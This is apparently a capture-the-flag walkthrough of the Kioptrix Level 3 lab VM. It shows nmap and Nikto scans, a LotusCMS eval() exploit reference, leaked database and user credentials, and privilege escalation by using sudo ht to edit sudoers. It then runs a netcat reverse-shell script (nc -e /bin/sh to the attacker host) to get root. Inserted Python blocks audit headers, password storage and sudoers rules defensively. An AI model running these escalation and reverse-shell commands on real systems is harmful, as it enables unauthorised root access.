Kioptrix Level 3

Information Gathering

nmap

root@kali:~# nmap -v -A -p1-65535 192.168.1.9
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 03:24 PST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:24
Completed NSE at 03:24, 0.00s elapsed
Initiating NSE at 03:24
Completed NSE at 03:24, 0.00s elapsed
Initiating NSE at 03:24
Completed NSE at 03:24, 0.00s elapsed
Initiating ARP Ping Scan at 03:24
Scanning 192.168.1.9 [1 port]
Completed ARP Ping Scan at 03:24, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:24
Completed Parallel DNS resolution of 1 host. at 03:25, 13.00s elapsed
Initiating SYN Stealth Scan at 03:25
Scanning 192.168.1.9 [65535 ports]
Discovered open port 22/tcp on 192.168.1.9
Discovered open port 80/tcp on 192.168.1.9
Completed SYN Stealth Scan at 03:25, 1.25s elapsed (65535 total ports)
Initiating Service scan at 03:25
Scanning 2 services on 192.168.1.9
Completed Service scan at 03:25, 6.03s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.9
NSE: Script scanning 192.168.1.9.
Initiating NSE at 03:25
Completed NSE at 03:25, 0.28s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.01s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Nmap scan report for 192.168.1.9
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:B9:F9:2B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.013 days (since Sat Dec  7 03:06:51 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms 192.168.1.9

NSE: Script Post-scanning.
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Initiating NSE at 03:25
Completed NSE at 03:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds
           Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
root@kali:~# 

Nikto


root@kali:~# nikto -h http://192.168.1.9
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.9
+ Target Hostname:    192.168.1.9
+ Target Port:        80
+ Start Time:         2019-12-07 03:25:32 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 12:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2019-12-07 03:26:11 (GMT-8) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
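The Nikto findings above (PHPSESSID without HttpOnly, missing X-Frame-Options / X-XSS-Protection / X-Content-Type-Options, version disclosure in Server and X-Powered-By) can be checked offline against any captured response. The following is an added example, not part of the original writeup: it parses a raw HTTP response and reports the same classes of finding, and also shows a hardened response that passes the audit. The two response strings are constructed to match the headers Nikto reported, not real captures.

```python
import re

# Constructed sample response modelled on the Nikto output for this box
# (Apache/2.2.8, PHP/5.2.4, PHPSESSID cookie without HttpOnly). Not a capture.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sat, 07 Dec 2019 11:25:32 GMT\r\n"
    "Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch\r\n"
    "X-Powered-By: PHP/5.2.4-2ubuntu5.6\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed response showing the corrected configuration: no version
# strings, HttpOnly on the session cookie, and the three defensive headers.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=0123456789abcdef; path=/; HttpOnly\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers Nikto expects to see, with the reason each one matters.
REQUIRED_HEADERS = {
    "x-frame-options": "clickjacking protection missing",
    "x-content-type-options": "MIME sniffing protection missing",
    "x-xss-protection": "legacy XSS filter hint missing",
}


def parse_headers(raw):
    """Split a raw HTTP response into (status line, [(name_lower, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_headers(raw):
    """Return a list of finding strings for the raw HTTP response."""
    _, headers = parse_headers(raw)
    present = {name for name, _ in headers}
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            cookie_name = value.split("=", 1)[0]
            # Attributes follow the first ';' and are case-insensitive.
            attrs = [a.strip().lower() for a in value.split(";")[1:]]
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie_name} set without HttpOnly")
        elif name in ("server", "x-powered-by") and re.search(r"\d+\.\d+", value):
            findings.append(f"{name} discloses version: {value}")
    for name, why in REQUIRED_HEADERS.items():
        if name not in present:
            findings.append(f"{name} not set ({why})")
    return findings


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_RESPONSE):
        print("weak:", finding)
    print("hardened findings:", audit_headers(HARDENED_RESPONSE))
```

The same checks can be run against a live host by feeding the bytes returned by `http.client` or `curl -i` into `audit_headers`; the cookie check matches Nikto's report of the missing `httponly` flag.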

Use Exploit.


LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | exploits/php/remote/18565.rb

Get www-data privileges. Get the phpMyAdmin user and password from gconfig.php:
cat gconfig.php
 
 $GLOBALS["gallarific_mysql_server"] = "localhost";
 $GLOBALS["gallarific_mysql_database"] = "gallery";
 $GLOBALS["gallarific_mysql_username"] = "root";
 $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

Get loneferret user credentials from the users table in phpMyAdmin


1  dreg  0d3eccfb887aabd50f243b3f155c0f85   Mast3r
2  loneferret  5badcaf789d3d1d09794d8f021f40f0e starwars

admin n0t7t1k4
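The stored hashes above are 32 hex characters with no salt and no scheme prefix, which is unsalted MD5: every user with the same password gets the same hash and each guess costs one fast hash. The following is an added example, not code from the writeup or from the gallery application: it shows how an audit can recognise that storage format, and the salted, slow PBKDF2 scheme a fix would migrate to at the user's next login. The row and the migration function are constructed for illustration.

```python
import hashlib
import hmac
import os

# Constructed sample row in the format the writeup shows: username and an
# unsalted MD5 hex digest (this value is md5("starwars")).
LEGACY_ROW = ("loneferret", "5badcaf789d3d1d09794d8f021f40f0e")

PBKDF2_ITERATIONS = 600_000  # assumed work factor for the hardened scheme


def legacy_hash(password):
    """Unsalted MD5, as the gallery application stores passwords."""
    return hashlib.md5(password.encode()).hexdigest()


def looks_like_unsalted_md5(stored):
    """Audit heuristic: 32 lowercase hex chars with no scheme or salt separator."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored)


def legacy_verify(password, stored):
    """Constant-time comparison against a legacy MD5 digest."""
    return hmac.compare_digest(legacy_hash(password), stored)


def hardened_hash(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, stored self-describing."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def hardened_verify(password, stored):
    """Recompute PBKDF2 from the stored salt and iteration count and compare."""
    scheme, iters, salt_hex, dk_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def migrate_on_login(legacy_stored, password):
    """Hypothetical migration step: if the legacy digest matches the password
    the user just typed, return a hardened record to overwrite it with."""
    if looks_like_unsalted_md5(legacy_stored) and legacy_verify(password, legacy_stored):
        return hardened_hash(password)
    return None


if __name__ == "__main__":
    user, digest = LEGACY_ROW
    print(user, "uses unsalted MD5:", looks_like_unsalted_md5(digest))
    # Same password, two users: identical legacy digests, distinct hardened ones.
    print(legacy_hash("starwars") == legacy_hash("starwars"))
    print(hardened_hash("starwars") != hardened_hash("starwars"))
```

The migration keeps the login path working without ever needing the plaintext in bulk: the legacy digest is replaced the first time the user authenticates successfully.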

Try MySQL UDF (lib_mysqludf_sys.so) --- Failed


select * from udftable into dumpfile '/usr/lib/lib_mysqludf_sys.so';
ERROR 1 (HY000) at line 2: Can't create/write to file '/usr/lib/lib_mysqludf_sys.so' (Errcode: 13)

Use ht

loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
--------------------------
export TERM=xterm-basic

edit sudoers


Add "loneferret ALL=(ALL) ALL" to the /etc/sudoers file

Reverse shell

loneferret@Kioptrix3:/etc$ cat /tmp/1.sh
#!/bin/sh
nc 192.168.1.7 999 -e /bin/sh
loneferret@Kioptrix3:/etc$ sudo /tmp/1.sh

Got shell


root@kali:/usr/share/exploitdb/exploits/php/webapps# nc -nvlp 999
listening on [any] 999 ...
whoami
whoami
connect to [192.168.1.7] from (UNKNOWN) [192.168.1.9] 42260
root
root
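The privilege escalation above rests on a single sudoers rule: `ht` is an interactive editor, so allowing it via sudo lets the user write any root-owned file, including /etc/sudoers, after which a full `ALL=(ALL) ALL` rule and `sudo /tmp/1.sh` follow. The following is an added example, not part of the original writeup: a small sudoers audit that parses user specifications and flags the patterns that amount to an unrestricted root grant. The sample sudoers text is constructed; the `loneferret` rule with `ht` is a hypothetical illustration of the pattern, and the second `loneferret` line is the rule the writeup adds.

```python
import os
import re

# Constructed sample sudoers content (not taken from the box).
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
root    ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
loneferret ALL=(ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/vim
"""

# Programs that let the caller write arbitrary files or spawn a shell as the
# run-as user; allowing them via sudo is equivalent to allowing everything.
FILE_WRITING_PROGRAMS = {
    "ht", "vi", "vim", "nano", "ed", "less", "more",
    "sh", "bash", "python", "perl",
}

# user  host = (runas) TAG: command, command
RULE_RE = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*(.*)$")


def parse_sudoers(text):
    """Yield (user, host, runas, tags, commands) for each user specification."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, runas, rest = m.groups()
        tags = []
        while True:  # peel off NOPASSWD:, SETENV:, ... prefixes
            tm = TAG_RE.match(rest)
            if not tm:
                break
            tags.append(tm.group(1))
            rest = tm.group(2)
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        yield user, host, runas or "root", tags, commands


def audit_sudoers(text):
    """Return findings for rules that effectively grant full root."""
    findings = []
    for user, host, runas, tags, commands in parse_sudoers(text):
        if user == "root":
            continue
        for cmd in commands:
            if cmd.startswith("!"):
                # sudoers(5) warns that subtracting commands with '!' is not
                # an effective restriction; report it rather than trust it.
                findings.append(f"{user}: negated command {cmd} is not a reliable restriction")
                continue
            if cmd == "ALL":
                findings.append(f"{user}: may run any command as {runas}")
                continue
            prog = os.path.basename(cmd.split()[0])
            if prog in FILE_WRITING_PROGRAMS:
                findings.append(f"{user}: {cmd} as {runas} can edit files such as /etc/sudoers")
        if "NOPASSWD" in tags:
            findings.append(f"{user}: NOPASSWD removes the password check")
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("finding:", finding)
```

Run against a real file with `visudo -c` first to confirm the syntax is valid, then pass the file contents to `audit_sudoers`; a rule naming an editor is the one to fix, since adding the `ALL=(ALL) ALL` line is only possible once the editor runs as root.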
